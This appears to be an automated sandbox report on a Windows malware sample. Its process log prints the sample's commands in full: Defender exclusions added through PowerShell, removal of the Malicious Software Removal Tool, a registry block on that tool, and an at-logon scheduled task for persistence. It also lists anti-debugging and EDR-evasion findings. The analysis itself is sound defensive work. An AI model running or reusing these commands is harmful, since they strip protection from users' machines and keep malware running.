Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Acc
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition3
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus PipesYE4
Source: SgrmBroker.exe, 00000018.00000003.2374418575.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377462053.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374630747.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374902804.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374697966.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interru
Source: SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Range
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine BusLwQ
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processormui7\O
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical ProcessorGE"
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656543805.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653171137.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655673640.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651694113.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Re
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651759830.00000245B0E41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652899480.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652596169.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652293425.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652771513.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DBF6C0 IsDebuggerPresent, 24_2_00007FF6D9DBF6C0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1680 RtlReAllocateHeap,GetErrorInfo,SafeArrayDestroy,ProcessPrng,GetProcessHeap,HeapAlloc,GetErrorInfo,VariantClear,GetProcessHeap,HeapFree,VariantClear,HeapFree,HeapFree,HeapFree,HeapFree,SafeArrayDestroy,GetErrorInfo,HeapFree,HeapFree, 24_2_00007FF6D9CF1680
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD8D8C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FF6D9DD8D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCF3BC Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCF455 Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCDEF5 Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCE06C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF60994161C Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF6099414A8 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF609942A25 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF60994298C Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f Jump to behavior
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd|
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Queries volume information: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Queries volume information: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Code function: 23_2_00007FF684C84A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 23_2_00007FF684C84A40
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543318 Sample: SecuriteInfo.com.Variant.Gi... Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 43 Multi AV Scanner detection for submitted file 2->43 45 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->45 47 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->47 49 2 other signatures 2->49 8 SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe 9 6 2->8         started        process3 file4 41 C:\Users\Public\...\SppExtComObj.exe, PE32+ 8->41 dropped 51 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 8->51 53 Creates an undocumented autostart registry key 8->53 55 Drops large PE files 8->55 57 3 other signatures 8->57 12 SgrmBroker.exe 8->12         started        15 powershell.exe 23 8->15         started        17 cmd.exe 1 8->17         started        19 3 other processes 8->19 signatures5 process6 signatures7 59 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 12->59 61 Queries memory information (via WMI often done to detect virtual machines) 12->61 63 Found direct / indirect Syscall (likely to bypass EDR) 12->63 21 cmd.exe 12->21         started        65 Loading BitLocker PowerShell Module 15->65 23 WmiPrvSE.exe 15->23         started        25 conhost.exe 15->25         started        67 Uses schtasks.exe or at.exe to add and modify task schedules 17->67 27 conhost.exe 17->27         started        29 wusa.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 19->33         started        35 reg.exe 1 1 19->35         started        process8 process9 37 conhost.exe 21->37         started        39 schtasks.exe 21->39         started       
No contacted IP infos